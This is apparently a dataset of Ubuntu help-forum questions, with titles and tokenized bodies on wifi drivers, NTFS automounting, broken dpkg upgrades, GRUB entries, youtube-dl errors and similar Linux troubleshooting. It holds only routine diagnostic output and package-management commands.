431500	how to fix zeitgeist database creation error	i 've encountered the seemingly ubiquitous problem of unity not being able to find local apps when searching . after trying the advice left in these questions : application lens installend but missing in dash applications are n't displayed in dash after upgrading to 12.04 http : //ubuntuforums.org/showthread.php ? t=1911109 ( and others ) i 'm still left with the issue of the dash search not working correctly . however , on trying the advice in the 3rd link , i get this terminal output : zeitgeist-daemon -r -- log-level=debug [ 21:20:04.190882 debug ] utils.vala:67 : data_path = /home/jordan/.local/share/zeitgeist [ 21:20:04.191229 debug ] utils.vala:86 : database_file_path = /home/jordan/.local/share/zeitgeist/activity.sqlite [ 21:20:04.192282 debug ] sql-schema.vala:204 : schema_version is -1 [ 21:20:04.376711 warning ] zeitgeist-daemon.vala:504 : ca n't create database : 10 , disk i/o error unable to execute sql : and a basic google search did n't turn up anything useful ( unless i had some temporary blindness going on ) . can someone advise me here ? thanks !
431501	ubuntu wireless issue - broadcom 14e4:4319 / 14e4:4320 - broke then fixed then broke	dear ubuntu community , i was having as issue with my broadcom wireless card , model : broadcom corporation bcm4318 [ airforce 54g ] 802.11a/b/g pci express transceiver [ 14e4:4319 ] ( rev 02 ) broadcom corporation bcm4306 802.11b/g wireless lan controller [ 14e4:4320 ] ( rev 03 ) i was able to get it working by reading several solutions , the most concise is here : https : //help.ubuntu.com/community/broadcomsta % 28wireless % 29 the wireless card was working great until i tried some changes to setup vnc . i was following this tutorial : https : //www.digitalocean.com/community/articles/how-to-setup-vnc-for-ubuntu-12 i ran this in terminal : apt-get -y install ubuntu-desktop tightvncserver xfce4 xfce4-goodies it installed/ changed lots of stuff . after rebooting , the wireless card no longer worked . i repeated the procedure to fix the wireless , but it did not help . i have tried uninstalling all of the drivers and firmware and reinstalling , and it did not help . i tried uninstalling ubuntu-desktop , tightvncserver , xfce4 , and xfce4-goodies . it did not help . i noticed that in my login screen , i have an xfce gui option that did not exist before . i am not sure how that appeared , how to get rid of it , or if it matters . below is the terminal output of the broadcom wireless fix procedure now and when it was working . thanks in advance to anyone that can help and sorry it there is a fix already posted . output now : mike @ mike-inspiron-2200 : ~ $ lspci -vvnn | grep 14e4 02:03.0 network controller [ 0280 ] : broadcom corporation bcm4318 [ airforce 54g ] 802.11a/b/g pci express transceiver [ 14e4:4319 ] ( rev 02 ) 03:00.0 network controller [ 0280 ] : broadcom corporation bcm4306 802.11b/g wireless lan controller [ 14e4:4320 ] ( rev 03 ) mike @ mike-inspiron-2200 : ~ $ sudo apt-get purge bcmwl-kernel-source broadcom-sta-common broadcom-sta-source reading package lists ... done building dependency tree reading state information ... done package broadcom-sta-common is not installed , so not removed package broadcom-sta-source is not installed , so not removed package bcmwl-kernel-source is not installed , so not removed 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . mike @ mike-inspiron-2200 : ~ $ sudo apt-get install b43-fwcutter firmware-b43-installer reading package lists ... done building dependency tree reading state information ... done b43-fwcutter is already the newest version . firmware-b43-installer is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . mike @ mike-inspiron-2200 : ~ $ rfkill list mike @ mike-inspiron-2200 : ~ $ rfkill unblock all mike @ mike-inspiron-2200 : ~ $ rfkill unblock wifi mike @ mike-inspiron-2200 : ~ $ rfkill unblock wlan mike @ mike-inspiron-2200 : ~ $ lsmod | grep b43 mike @ mike-inspiron-2200 : ~ $ dmesg | grep b43 mike @ mike-inspiron-2200 : ~ $ iwconfig lo no wireless extensions . eth0 no wireless extensions . output when it was working : mike @ mike-inspiron-2200 : ~ $ lspci -vvnn | grep 14e4 02:03.0 network controller [ 0280 ] : broadcom corporation bcm4318 [ airforce 54g ] 802.11a/b/g pci express transceiver [ 14e4:4319 ] ( rev 02 ) 03:00.0 network controller [ 0280 ] : broadcom corporation bcm4306 802.11b/g wireless lan controller [ 14e4:4320 ] ( rev 03 ) mike @ mike-inspiron-2200 : ~ $ sudo apt-get purge bcmwl-kernel-source broadcom-sta-common broadcom-sta-source [ sudo ] password for mike : reading package lists ... done building dependency tree reading state information ... done package broadcom-sta-common is not installed , so not removed package broadcom-sta-source is not installed , so not removed package bcmwl-kernel-source is not installed , so not removed the following packages were automatically installed and are no longer required : language-pack-kde-en language-pack-kde-en-base kde-l10n-engb dkms use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 9 not upgraded . mike @ mike-inspiron-2200 : ~ $ sudo apt-get install b43-fwcutter firmware-b43-installer reading package lists ... done building dependency tree reading state information ... done b43-fwcutter is already the newest version . firmware-b43-installer is already the newest version . the following packages were automatically installed and are no longer required : language-pack-kde-en language-pack-kde-en-base kde-l10n-engb dkms use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 9 not upgraded . mike @ mike-inspiron-2200 : ~ $ rfkill list 0 : phy0 : wireless lan soft blocked : yes hard blocked : no 3 : phy3 : wireless lan soft blocked : yes hard blocked : no mike @ mike-inspiron-2200 : ~ $ rfkill unblock all mike @ mike-inspiron-2200 : ~ $ rfkill list 0 : phy0 : wireless lan soft blocked : no hard blocked : no 3 : phy3 : wireless lan soft blocked : no hard blocked : no mike @ mike-inspiron-2200 : ~ $ lsmod | grep b43 b43 342801 0 mac80211 436493 1 b43 cfg80211 178877 2 b43 , mac80211 bcma 25651 1 b43 ssb 50691 1 b43 mike @ mike-inspiron-2200 : ~ $ dmesg | grep b43 [ 2.654782 ] b43-pci-bridge 0000:02:03.0 : pci int a - > gsi 19 ( level , low ) - > irq 19 [ 19.712097 ] b43-phy0 : broadcom 4318 wlan found ( core revision 9 ) [ 19.840462 ] registered led device : b43-phy0 : :tx [ 19.840565 ] registered led device : b43-phy0 : :rx [ 19.840666 ] registered led device : b43-phy0 : :radio [ 36.904453 ] b43-pci-bridge 0000:03:00.0 : enabling device ( 0000 - > 0002 ) [ 36.904466 ] b43-pci-bridge 0000:03:00.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 36.904480 ] b43-pci-bridge 0000:03:00.0 : setting latency timer to 64 [ 36.913476 ] b43-phy1 : broadcom 4306 wlan found ( core revision 5 ) [ 36.963213 ] registered led device : b43-phy1 : :tx [ 36.963245 ] registered led device : b43-phy1 : :rx [ 36.963279 ] registered led device : b43-phy1 : :radio [ 1334.783146 ] b43-pci-bridge 0000:03:00.0 : pci int a disabled [ 1353.696423 ] b43-pci-bridge 0000:03:00.0 : enabling device ( 0000 - > 0002 ) [ 1353.696437 ] b43-pci-bridge 0000:03:00.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 1353.696451 ] b43-pci-bridge 0000:03:00.0 : setting latency timer to 64 [ 1353.704129 ] b43-phy2 : broadcom 4306 wlan found ( core revision 5 ) [ 1353.753909 ] registered led device : b43-phy2 : :tx [ 1353.753942 ] registered led device : b43-phy2 : :rx [ 1353.753974 ] registered led device : b43-phy2 : :radio [ 1884.432089 ] b43-phy0 : loading firmware version 508.1084 ( 2009-01-14 01:32:01 ) [ 1884.932090 ] b43-phy2 : loading firmware version 508.1084 ( 2009-01-14 01:32:01 ) [ 2003.352113 ] b43-phy0 : loading firmware version 508.1084 ( 2009-01-14 01:32:01 ) [ 2003.572040 ] b43-phy2 : loading firmware version 508.1084 ( 2009-01-14 01:32:01 ) [ 2475.717013 ] b43-pci-bridge 0000:03:00.0 : pci int a disabled [ 2475.759016 ] b43-pci-bridge 0000:02:03.0 : pci int a disabled [ 2476.177343 ] b43-pci-bridge 0000:02:03.0 : restoring config space at offset 0xf ( was 0x100 , writing 0x101 ) [ 2476.177364 ] b43-pci-bridge 0000:02:03.0 : restoring config space at offset 0x4 ( was 0x0 , writing 0xdfdfe000 ) [ 2476.177371 ] b43-pci-bridge 0000:02:03.0 : restoring config space at offset 0x3 ( was 0x0 , writing 0x4000 ) [ 2476.177379 ] b43-pci-bridge 0000:02:03.0 : restoring config space at offset 0x1 ( was 0x0 , writing 0x106 ) [ 2476.888273 ] b43-pci-bridge 0000:03:00.0 : restoring config space at offset 0xf ( was 0x100 , writing 0x110 ) [ 2476.888302 ] b43-pci-bridge 0000:03:00.0 : restoring config space at offset 0x4 ( was 0x0 , writing 0x28000000 ) [ 2476.888310 ] b43-pci-bridge 0000:03:00.0 : restoring config space at offset 0x3 ( was 0x0 , writing 0x4000 ) [ 2476.888320 ] b43-pci-bridge 0000:03:00.0 : restoring config space at offset 0x1 ( was 0x0 , writing 0x6 ) [ 2476.949145 ] b43-pci-bridge 0000:02:03.0 : pci int a - > gsi 19 ( level , low ) - > irq 19 [ 2476.960101 ] b43-pci-bridge 0000:03:00.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 2478.367220 ] b43-pci-bridge 0000:03:00.0 : pci int a disabled [ 2478.367527 ] b43-pci-bridge 0000:03:00.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 2478.371308 ] b43-phy3 : broadcom 4306 wlan found ( core revision 5 ) [ 2478.417345 ] registered led device : b43-phy3 : :tx [ 2478.417381 ] registered led device : b43-phy3 : :rx [ 2478.417412 ] registered led device : b43-phy3 : :radio
431504	no permission to automount external hdd using ntfs-3g	i wanted to modify my mount options for my ntfs external hdd so that i can execute programs on it . i added the following line to my fstab accordingly : uuid=ce665a3f665a290b /media/josh ntfs-3g defaults , users , nofail 0 0 but when i plug in my external and i get this error : error mounting : mount exited with exit code 1 : helper failed with : error opening '/dev/sdb1 ' : permission denied failed to mount '/dev/sdb1 ' : permission denied please check '/dev/sdb1 ' and the ntfs-3g binary permissions , and the mounting user id . more explanation is provided at http : //tuxera.com/community/ntfs-3g-faq/ # unprivileged . soo i go to the url provided . it says : unprivileged block device mounts work only if all the below requirements are met : ntfs-3g is compiled with integrated fuse support the ntfs-3g binary is at least version 1.2506 the ntfs-3g binary is set to setuid-root the user has access right to the volume the user has access right to the mount point i believe i have all 5 requirements met ( though obviously not , since i 'm getting that error ) . anyone have some tips ? in particular , i have : ntfs-3g 2014.2.15 integrated fuse 27 ntfs-3g 2014.2.15 integrated fuse 27 -rwsr-xr-x 1 root root 504887 mar 8 12:06 /bin/ntfs-3g* brw-rw -- -- 1 root disk 8 , 17 mar 8 16:43 /dev/sdb1 ( my user is in the `` disk '' group ) drwxrwxrwx 2 josh josh 4096 mar 8 12:42 josh/ been struggling with this for hours . this link has been the most helpful so far , but notably the last post has my same question and is unanswered . thanks !
431505	how can i list the hard drive and all it 's partitions including size from terminal ?	i have ubuntu server 12.04 installed with no gui . i would like to list my hard drive and it 's partitions along with how big each partition is using the command line .
431508	unable to download videos using youtube-dl ( 'sig error ' ) , how to correct ?	i used to download videos using youtube-dl command line tool , from the past two days whenever i try to download any video i get an error as shown below . $ youtube-dl https : //www.youtube.com/watch ? v=bfew8mgqj9o [ youtube ] setting language [ youtube ] bfew8mgqj9o : downloading video webpage [ youtube ] bfew8mgqj9o : downloading video info webpage [ youtube ] bfew8mgqj9o : extracting video information traceback ( most recent call last ) : file `` /usr/bin/youtube-dl '' , line 4645 , in < module > main ( ) file `` /usr/bin/youtube-dl '' , line 4636 , in main _real_main ( ) file `` /usr/bin/youtube-dl '' , line 4620 , in _real_main retcode = fd.download ( all_urls ) file `` /usr/bin/youtube-dl '' , line 869 , in download ie.extract ( url ) file `` /usr/bin/youtube-dl '' , line 1135 , in extract return self._real_extract ( url ) file `` /usr/bin/youtube-dl '' , line 1406 , in _real_extract url_map = dict ( ( ud [ 'itag ' ] [ 0 ] , ud [ 'url ' ] [ 0 ] + ' & signature= ' + ud [ 'sig ' ] [ 0 ] ) for ud in url_data ) file `` /usr/bin/youtube-dl '' , line 1406 , in < genexpr > url_map = dict ( ( ud [ 'itag ' ] [ 0 ] , ud [ 'url ' ] [ 0 ] + ' & signature= ' + ud [ 'sig ' ] [ 0 ] ) for ud in url_data ) keyerror : 'sig' whats going on ?
431511	windows not in grub startup screen	i recently used boot repair to fix grub startup , but now when i start my computer , windows xp , my old os , does n't apppear . it shows ubuntu , ubuntu ( recovery mode ) , memory test and a second memory test . there is also a subsection for previous linux versions , but that only contains ubuntu and its recovery . help would be greatly appreciated !
431513	ca n't run software updater or get debian packages to work or access source files and ubuntu software center not working	install button in software center stays gray after clicked but does n't do anything . this is what i get when i try and update and upgrade . daniela @ daniela-latitude-e6400 : ~ $ sudo apt-get upgrade [ sudo ] password for daniela : reading package lists ... done building dependency tree reading state information ... done the following packages have been kept back : linux-headers-generic linux-image-generic 0 upgraded , 0 newly installed , 0 to remove and 2 not upgraded . 23 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up lsb-release ( 4.0-0ubuntu26.2 ) ... traceback ( most recent call last ) : file `` /usr/bin/py3compile '' , line 37 , in < module > from debpython.option import option , compile_regexpr eoferror : eof read where not expected error in sys.excepthook : traceback ( most recent call last ) : file `` /usr/lib/python3/dist-packages/apport_python_hook.py '' , line 64 , in apport_excepthook from apport.fileutils import likely_packaged , get_recent_crashes file `` /usr/lib/python3/dist-packages/apport/__init__.py '' , line 4 , in < module > from apport.report import report file `` /usr/lib/python3/dist-packages/apport/report.py '' , line 30 , in < module > import apport.fileutils file `` /usr/lib/python3/dist-packages/apport/fileutils.py '' , line 23 , in < module > from apport.packaging_impl import impl as packaging file `` /usr/lib/python3/dist-packages/apport/packaging_impl.py '' , line 20 , in < module > import apt eoferror : eof read where not expected original exception was : traceback ( most recent call last ) : file `` /usr/bin/py3compile '' , line 37 , in < module > from debpython.option import option , compile_regexpr eoferror : eof read where not expected dpkg : error processing lsb-release ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of python3-distupgrade : python3-distupgrade depends on lsb-release ; however : package lsb-release is not configured yet . dpkg : error processing python3-distupgrade ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of python3-update-manager : python3-update-manager depends on python3-distupgrade ; however : package python3-distupgrade is not configured yet . python3-update-manager depends on lsb-release ; however : package lsb-release is not configured yet . dpkg : error processing python3-update-manager ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of ubuntu-release-upgrader-core : ubuntu-release-upgrader-core depends on python3-distupgrade ( = 1:0.190.8 ) ; however : package python3-distupgrade is not configured yet . dpkg : error processing ubuntu-release-upgrader-core ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of update-manager-core : update-manager-core depends on python3-update-manager ( = 1:0.174.5 ) ; however : package python3-update-manager is not configured yet . update-manager-core depends on lsb-release ; however : package lsb-release is not configured yet . update-manager-core depends on ubuntu-release-upgrader-core ; however : package ubuntu-release-upgrader-core is not configured yet . dpkg : error processing update-manager-core ( -- configure ) : dependency problems - leaving unconfigured setting up python3-problem-report ( 2.6.1-0ubuntu13 ) ... no apport report written because maxreports is reached already traceback ( most recent call last ) : file `` /usr/bin/py3compile '' , line 37 , in < module > from debpython.option import option , compile_regexpr eoferror : eof read where not expected error in sys.excepthook : traceback ( most recent call last ) : file `` /usr/lib/python3/dist-packages/apport_python_hook.py '' , line 64 , in apport_excepthook from apport.fileutils import likely_packaged , get_recent_crashes file `` /usr/lib/python3/dist-packages/apport/__init__.py '' , line 4 , in < module > from apport.report import report file `` /usr/lib/python3/dist-packages/apport/report.py '' , line 30 , in < module > import apport.fileutils file `` /usr/lib/python3/dist-packages/apport/fileutils.py '' , line 23 , in < module > from apport.packaging_impl import impl as packaging file `` /usr/lib/python3/dist-packages/apport/packaging_impl.py '' , line 20 , in < module > import apt eoferror : eof read where not expected original exception was : traceback ( most recent call last ) : file `` /usr/bin/py3compile '' , line 37 , in < module > from debpython.option import option , compile_regexpr eoferror : eof read where not expected dpkg : error processing python3-problem-report ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of python3-apport : python3-apport depends on python3-problem-report ( > = 0.94 ) ; however : package python3-problem-report is not configured yet . python3-apport depends on lsb-release ; however : package lsb-release is not configured yet . dpkg : error processing python3-apport ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of apport : apport depends on python3-apport ( > = 2.6.1-0ubuntu13 ) ; however : package python3-apport is not configured yet . dpkg : error processing apport ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of apport-gtk : apport-gtk depends on python3-apport ( > = 2.6.1-0ubuntu13 ) ; however : package python3-apport is not configured yet . apport-gtk depends on apport ( > = 0.41 ) ; no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already however : package apport is not configured yet . dpkg : error processing apport-gtk ( -- configure ) : dependency problems - leaving unconfigured setting up checkbox ( 0.14.10 ) ... traceback ( most recent call last ) : file `` /usr/bin/py3compile '' , line 37 , in < module > from debpython.option import option , compile_regexpr eoferror : eof read where not expected error in sys.excepthook : traceback ( most recent call last ) : file `` /usr/lib/python3/dist-packages/apport_python_hook.py '' , line 64 , in apport_excepthook from apport.fileutils import likely_packaged , get_recent_crashes file `` /usr/lib/python3/dist-packages/apport/__init__.py '' , line 4 , in < module > from apport.report import report file `` /usr/lib/python3/dist-packages/apport/report.py '' , line 30 , in < module > import apport.fileutils file `` /usr/lib/python3/dist-packages/apport/fileutils.py '' , line 23 , in < module > from apport.packaging_impl import impl as packaging file `` /usr/lib/python3/dist-packages/apport/packaging_impl.py '' , line 20 , in < module > import apt eoferror : eof read where not expected original exception was : traceback ( most recent call last ) : file `` /usr/bin/py3compile '' , line 37 , in < module > from debpython.option import option , compile_regexpr eoferror : eof read where not expected dpkg : error processing checkbox ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of checkbox-qt : checkbox-qt depends on checkbox ( > = 0.14.10 ) ; however : package checkbox is not configured yet . dpkg : error processing checkbox-qt ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of firefox : firefox depends on lsb-release ; however : package lsb-release is not configured yet . dpkg : error processing firefox ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of xul-ext-unity : xul-ext-unity depends on firefox ( > = 10.0 ) ; however : package firefox is not configured yet . dpkg : error processing xul-ext-unity ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of firefox-globalmenu : firefox-globalmenu depends on firefox ; however : package firefox is not configured yet . no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already dpkg : error processing firefox-globalmenu ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of firefox-gnome-support : firefox-gnome-support depends on firefox ; however : package firefox is not configured yet . no apport report written because maxreports is reached already dpkg : error processing firefox-gnome-support ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of python-apport : python-apport depends on lsb-release ; however : package lsb-release is not configured yet . dpkg : error processing python-apport ( -- configure ) : dependency problems - leaving unconfigured setting up python3-httplib2 ( 0.7.4-2ubuntu0.1 ) ... no apport report written because maxreports is reached already traceback ( most recent call last ) : file `` /usr/bin/py3compile '' , line 37 , in < module > from debpython.option import option , compile_regexpr eoferror : eof read where not expected error in sys.excepthook : traceback ( most recent call last ) : file `` /usr/lib/python3/dist-packages/apport_python_hook.py '' , line 64 , in apport_excepthook from apport.fileutils import likely_packaged , get_recent_crashes file `` /usr/lib/python3/dist-packages/apport/__init__.py '' , line 4 , in < module > from apport.report import report file `` /usr/lib/python3/dist-packages/apport/report.py '' , line 30 , in < module > import apport.fileutils file `` /usr/lib/python3/dist-packages/apport/fileutils.py '' , line 23 , in < module > from apport.packaging_impl import impl as packaging file `` /usr/lib/python3/dist-packages/apport/packaging_impl.py '' , line 20 , in < module > import apt eoferror : eof read where not expected original exception was : traceback ( most recent call last ) : file `` /usr/bin/py3compile '' , line 37 , in < module > from debpython.option import option , compile_regexpr eoferror : eof read where not expected dpkg : error processing python3-httplib2 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of python3-software-properties : python3-software-properties depends on lsb-release ; however : package lsb-release is not configured yet . dpkg : error processing python3-software-properties ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of software-properties-common : software-properties-common depends on python3-software-properties ; however : package python3-software-properties is not configured yet . dpkg : error processing software-properties-common ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of software-properties-gtk : software-properties-gtk depends on python3-software-properties ; however : package python3-software-properties is not configured yet . software-properties-gtk depends on software-properties-common ; however : package software-properties-common is not configured yet . dpkg : error processing software-properties-gtk ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of update-manager : update-manager depends on update-manager-core ( = 1:0.174.5 ) ; however : package update-manager-core is not configured yet . dpkg : error processing update-manager ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of ubuntu-release-upgrader-gtk : ubuntu-release-upgrader-gtk depends on ubuntu-release-upgrader-core ( = 1:0.190.8 ) ; however : package ubuntu-release-upgrader-core is not configured yet . ubuntu-release-upgrader-gtk depends on update-manager ; however : package update-manager is not configured yet . ubuntu-release-upgrader-gtk depends on python3-distupgrade ( = 1:0.190.8 ) ; however : package python3-distupgrade is not configured yet . dpkg : error processing ubuntu-release-upgrader-gtk ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of xdiagnose : xdiagnose depends on python3-apport ; however : package python3-apport is not configured yet . dpkg : error processing xdiagnose ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already errors were encountered while processing : lsb-release python3-distupgrade python3-update-manager ubuntu-release-upgrader-core update-manager-core python3-problem-report python3-apport apport apport-gtk checkbox checkbox-qt firefox xul-ext-unity firefox-globalmenu firefox-gnome-support python-apport python3-httplib2 python3-software-properties software-properties-common software-properties-gtk update-manager ubuntu-release-upgrader-gtk xdiagnose e : sub-process /usr/bin/dpkg returned an error code ( 1 )
431514	problem during installation with manual partitions ?	my hdd is approximately 160 gb . i 've created 4 partitions : the / one ( ~25000 mb ) the /boot one , which is about 1 gb the swap ( another 2 gb ) a 50000 mb /home partition . now , on the device for boot loader installation option , i selected the boot partition ( i did so because i am going to dual boot ubuntu with another distro , tell me if something changes ) . and that 's it . the installation ends successfully , so i restart the computer . and the bios tells me there 's no os in the system ! i insert the dvd again , and in the partition scheme , it says that ubuntu is installed . where have i failed ?
431516	how can i install smartnav driver ?	i rely on smartnav to control the mouse and i 'm tired of windows . would wine help me ? edit : smartnav 4 at -- they do n't support linux so is there anyway to get the device to work ?
431521	ubuntu 13.10 and displaylink adapter	i 'm using 13.10 , and have upgraded my kernel to 3.14rc5 and blacklisted udlfb . i boot up , plug in the displaylink adapter , and eveything appears to be peachy at first blush : > lsusb bus 002 device 002 : id 17e9:0360 displaylink so far so good . taking a gander at xrandr , i can see the hdmi and dvi outputs . if i look in the display settings ( or arandr ) , i can see both outputs . when i check the output from dmesg , i see the displaylink adapter get picked up , but it never gets attached to a device . this feels very fishy , but i 'm still fairly new at this and hitting a wall . any suggestions ?
431526	guide for using juju in deploying to a raspberry pi	where is a small-c canonical guide located for using juju to deploy services to a raspberry pi or similar arm board ?
431527	problem with ttf-mscorefonts installer	please help me out with the below issue i tried `` sudo apt-get install ubuntu-restricted-extras '' on 13.10 and it all worked well until something named ttf-mscorefonts installer came . it was not getting downloaded for quite a few minutes .so i quit the process . now i am not able to install any software , not from software center . whenever i try with something like sudo apt-get install **** , it shows something like : neel101 @ neel101-inspiron-7520 : ~ $ sudo apt-get install pip [ sudo ] password for neel101 : e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem . neel101 @ neel101-inspiron-7520 : ~ $ sudo dpkg -- configure -a setting up update-notifier-common ( 0.147 ) ... ttf-mscorefonts-installer : downloading http : //downloads.sourceforge.net/corefonts/andale32.exe and this continues for several minutes ... . edit i pressed ctrl+c now and this came ^ctraceback ( most recent call last ) : file `` /usr/lib/update-notifier/package-data-downloader '' , line 296 , in < module > process_download_requests ( ) file `` /usr/lib/update-notifier/package-data-downloader '' , line 234 , in process_download_requests dest_file = urllib.urlretrieve ( files [ i ] ) [ 0 ] file `` /usr/lib/python2.7/urllib.py '' , line 94 , in urlretrieve return _urlopener.retrieve ( url , filename , reporthook , data ) file `` /usr/lib/python2.7/urllib.py '' , line 268 , in retrieve block = fp.read ( bs ) file `` /usr/lib/python2.7/socket.py '' , line 380 , in read data = self._sock.recv ( left ) keyboardinterrupt dpkg : error processing update-notifier-common ( -- configure ) : subprocess installed post-installation script was interrupted dpkg : dependency problems prevent configuration of ttf-mscorefonts-installer : ttf-mscorefonts-installer depends on update-notifier-common ( > = 0.119ubuntu2 ) ; however : package update-notifier-common is not configured yet . dpkg : error processing ttf-mscorefonts-installer ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of flashplugin-installer : flashplugin-installer depends on update-notifier-common ( > = 0.119ubuntu2 ) ; however : package update-notifier-common is not configured yet . dpkg : error processing flashplugin-installer ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : update-notifier-common ttf-mscorefonts-installer flashplugin-installer neel101 @ neel101-inspiron-7520 : ~ $
431528	printer does n't work with laptop	i just recently bought a canon pixma mg3550 printer and the disk that was supplied does n't work with wine , and the driver database does n't have the model , how can i get it to work with my laptop ? i 'm running linux ubuntu 12.04 lt .
431529	troubles with modules after upgrade to kernel 3.2.0-60	everything worked fine until kernel 3.2.0-58 . then the update manager proposed an update to 3.2.0-59 , i did it but the update did n't finished successfully ( i was able to boot but windows with error messages popped out continuously ) . so i uninstalled 3.2.0-59 in favour of -58 again , which i 'm currently using . today the update manager proposed to install kernel 3.2.0-60 , i said ok but still have problems . for example , wireless does n't work anymore . i mean that the wifi led is red instead of blue and even pressing f12 does n't help to activate the interface , which is recognized , though : $ sudo lshw -class network -short h/w path device class description =============================================== /0/100/1c/0 eth0 network rtl8111/8168/8411 pci express gigabit ethernet controller /0/100/1c.1/0 eth1 network bcm4313 802.11bgn wireless network adapter trying to understand what happened i did a module diff between -58 and -60 and surprisingly i noted some modules are missing in 3.2.0-60 : $ diff -u kernel-3.2.0-58 kernel-3.2.0-60 -- - kernel-3.2.0-58 2014-03-08 23:56:52.290500167 +0100 +++ kernel-3.2.0-60 2014-03-08 23:57:01.254500638 +0100 -fglrx 6179097 0 -vboxdrv 252228 3 vboxpci , vboxnetadp , vboxnetflt -vboxnetadp 13328 0 -vboxnetflt 27240 0 -vboxpci 22911 0 -wl 2906597 0 among others , wl module is missing , causing the wifi stop working . finally , still on -58 : $ modprobe -- list ... output ... updates/dkms/vboxnetflt.ko updates/dkms/vboxdrv.ko updates/dkms/fglrx.ko updates/dkms/wl.ko updates/dkms/vboxpci.ko updates/dkms/vboxnetadp.ko ... output ... any clue to make things to work with kernel 3.2.0-60 ?
431530	no wireless connection on 12.04 upgrade from ubuntu version 10 with broadcom network controller	i updated to 12.04 from ubuntu version 10 and now i ca n't connect by wifi . it works in windows and worked in 10. , network controller is a broadcom bcm4311 . i tried to remove and then reinstall , but it did not work . the pull down menu for networking does n't list wireless as an option . if i try to update/install firmware i get a message that it already is the newest version .
431531	regular expression problem , not finding the results i 'm expecting	i am writing a script to install some things and i 'm having trouble with a regular expression i am using . i have the wine repository in my apt sources ( ppa : ubuntu-wine/ppa ) and i am using the following command : apt-cache search wine [ 0-255 ] . [ 0-255 ] | sort -nr now i was expecting to get 'wine1.7 ' at the top of the list but it is n't even listed . instead if i run : apt-cache search wine | sort -nr i get a much longer list ( obviously ) it contains 'wine1.7 ' . the list that fails does show a few correct items that match my regex but not as many as without . these are a couple of examples : wine1.7-i386 - microsoft windows compatibility layer ( 32-bit support ) wine1.7-amd64 - microsoft windows compatibility layer ( 64-bit support ) wine1.5 - microsoft windows compatibility layer ( dummy package ) wine1.5-i386 - microsoft windows compatibility layer ( 32-bit support ) wine1.5-dev - microsoft windows compatibility layer ( 64-bit support ) as you cane see 'wine1.5 ' is list , but not 'wine1.7 ' . is there a better way to get this type of list ? or better yet a simple way of finding the latest version from a list to install ? thanks , noki
431533	when i start netbeans , unity sidebar and menu bar disappear	i 've just installed netbeans 7.4 with java7u51 on ubuntu 12.04 running in virtualbox , and every time i started netbeans the sidebar and the menubar from ubuntu 's desktop disappear . they 're still there ( if i move the mouse over the place where the icons should be the balloons appear saying which icon is there ) . the only thing that i can do to show the bars again is , after closing netbeans , click on the `` work areas '' icon , choose any work area and the bars are redrawn . what can i do to fix this ? it 's really annoying ...
431534	how to set nomodeset grub2 before i 've installed ubuntu	when i hit e this is what i see where do i place nomodeset
